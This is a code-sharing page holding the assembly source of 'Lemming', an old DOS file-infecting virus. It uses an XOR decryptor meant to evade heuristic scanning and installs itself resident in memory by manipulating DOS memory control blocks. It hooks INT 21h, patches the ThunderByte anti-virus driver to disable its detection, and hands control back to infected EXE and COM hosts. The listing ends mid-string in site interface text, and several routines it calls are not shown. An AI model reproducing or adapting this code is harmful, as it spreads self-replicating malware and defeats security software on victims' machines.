📄 lemming.asm
字号:
.286
.model tiny
.code
virus_size equ vir_end - start
virus_siz equ virus_size + virus_size
decrypt_size equ handle - next_function
data_size equ vir_end - step1
engine_size equ next_function - start
Int21_base equ 021h*4
timer_seg equ 01ch*4+2
virus_paragraphs equ virus_size * 2/16
code segment
assume cs:code,ds:code,es:code
progr equ 0100h
org progr
main:
start:
mov cx,decrypt_size
lea si,next_function
call ofset
ofset: pop bp
sub bp,109h ;Set postion of base pointer
decrypt:
xor byte ptr cs:[si][bp],00 ;Anti heuristic decryptor
key: ;will fool Thunderbyte.
jcxz next_function
dec cx
inc si
jmp decrypt
fooled_tbav:
next_function:
push es
push ds
push cs
pop ds
call getcpu ;Detect CPU
je _8086
mov ax,0fffeh ;Determine if installed
int 21h
cmp bx,0ffffh ;Returns ffff in bx if so...
test_processor:
jne install__
_8086: jmp end_install ;Not 80286 compatible
transfer:
call get_int21
mov di,0100h
push cs
pop ds
lea si,word ptr cs:start[bp]
mov cx,virus_size
move:
rep movsb ;Move virus and make resident
copied:
call set_int21 ;Set int 21 to virus
jmp end_install
install__ proc near
push ds es
call anti_av ;Detect the presence of TBDRIVER
pop es ds ;and patch
mov ax,5802h ;are umb's available?
int 21h
jc install_low ;no then install in low memory
mov ax,5803h ;Chain mcb's into low memory
mov bx,1
int 21h
jc install_low
push es ;get current mcb
pop dx
dec dx
mov di,3 ;add to current mcb to get
;pointer to next mcb
walk: mov es,dx
cmp byte ptr es:[di-3],05ah
je lastmcb
add dx,word ptr es:di
inc dx ;search for last mcb.
mov es,dx
cmp byte ptr es:[di-3],05ah
jne walk
lastmcb:
mov ax,5803h ;remove umb link
xor bx,bx
int 21h
cmp word ptr es:[di],virus_paragraphs
ja hi_install ;Enough memory for UMB install?
push cs
pop es
jmp install_low
hi_install:
inc dx
mov es,dx ;es points to virus new CS
install_low:
push es
xor di,di
push es ;original psp segment
pop dx
dec dx
mov es,dx
cmp byte ptr es:[di],5ah
jne end_install
mov ax,virus_siz
mov cl,4
shr ax,cl
inc ax
inc ax
sub word ptr es:[di+3],ax ;
mov ax,word ptr es:[di+3] ;copy last mcb size into ax
pop cx
add cx,ax ;new segment
sub cx,10h
mov word ptr cs:new_seg[bp],cx
mov es,cx
jmp transfer ;go and move virus to new
;memory position
install__ endp
end_install:
pop ds
pop es
lea di,word ptr cs:buffer1[bp]
mov ax,05a4dh
cmp word ptr cs:[di],ax
jne goto_com
mov ax,word ptr cs:[di+16h]
push es
pop bx
add bx,10h
add ax,bx ;code segment
mov cx,word ptr cs:[di+0eh] ;get original ss
mov dx,word ptr cs:[di+10h] ;get original sp
add cx,bx
cli
mov ss,cx ;restore original ss and sp
mov sp,dx
sti
push ax
mov bx,word ptr cs:[di+14h] ;get original ip
push bx
call clear_reg ;clear all registers
retf ;and hand back control
goto_com:
cld
lea si,buffer1[bp] ;restore com entry point
mov di,0100h
mov cx,18h
rep movsb
push 0100h
call clear_reg
ret ;hand back control
clear_reg:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp
ret
anti_av proc near
; DISABLE TBDRIVER AGAINST TUNNELING DETECT
mov ax,5200h
int 21h ;es:bx
add bx,22h ;pointer to first device 'NUL'
;or 'CON'
next_search:
cld
lds si,word ptr es:bx
cmp si,-1
je not_found
push ds cs
pop es
lea di,scan[bp]
push si
add si,10 ;device name offset
;from bx pointer
mov cx,5
rep cmpsb ;search for device name
pop bx es
jne next_search
found: ;If TBDRIVER is found then
push ds ;patch against tunneling
pop es
push cs
pop ds
mov di,bx
xor ax,ax
lea si,scan_string[bp]
next_char:
inc ax
mov cx,5
push si
rep cmpsb ;search for string
pop si
je bullseye
cmp ax,10116
je not_found
jmp next_char
bullseye:
mov es:[di-12],09090h ;disable tbdriver
not_found:
ret
scan db 'TBDRV'
scan_string db 0fah,09ch,0fch,053h,050h
anti_av endp
VirName db 0dh,0ah,'The Rise and Fall of ThunderByte-1994-Australia.',0dh,0ah
db ' You Will Never Trust Anti-Virus Software Again!! ',0dh,0ah
db '[LEMMING] ver .99⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -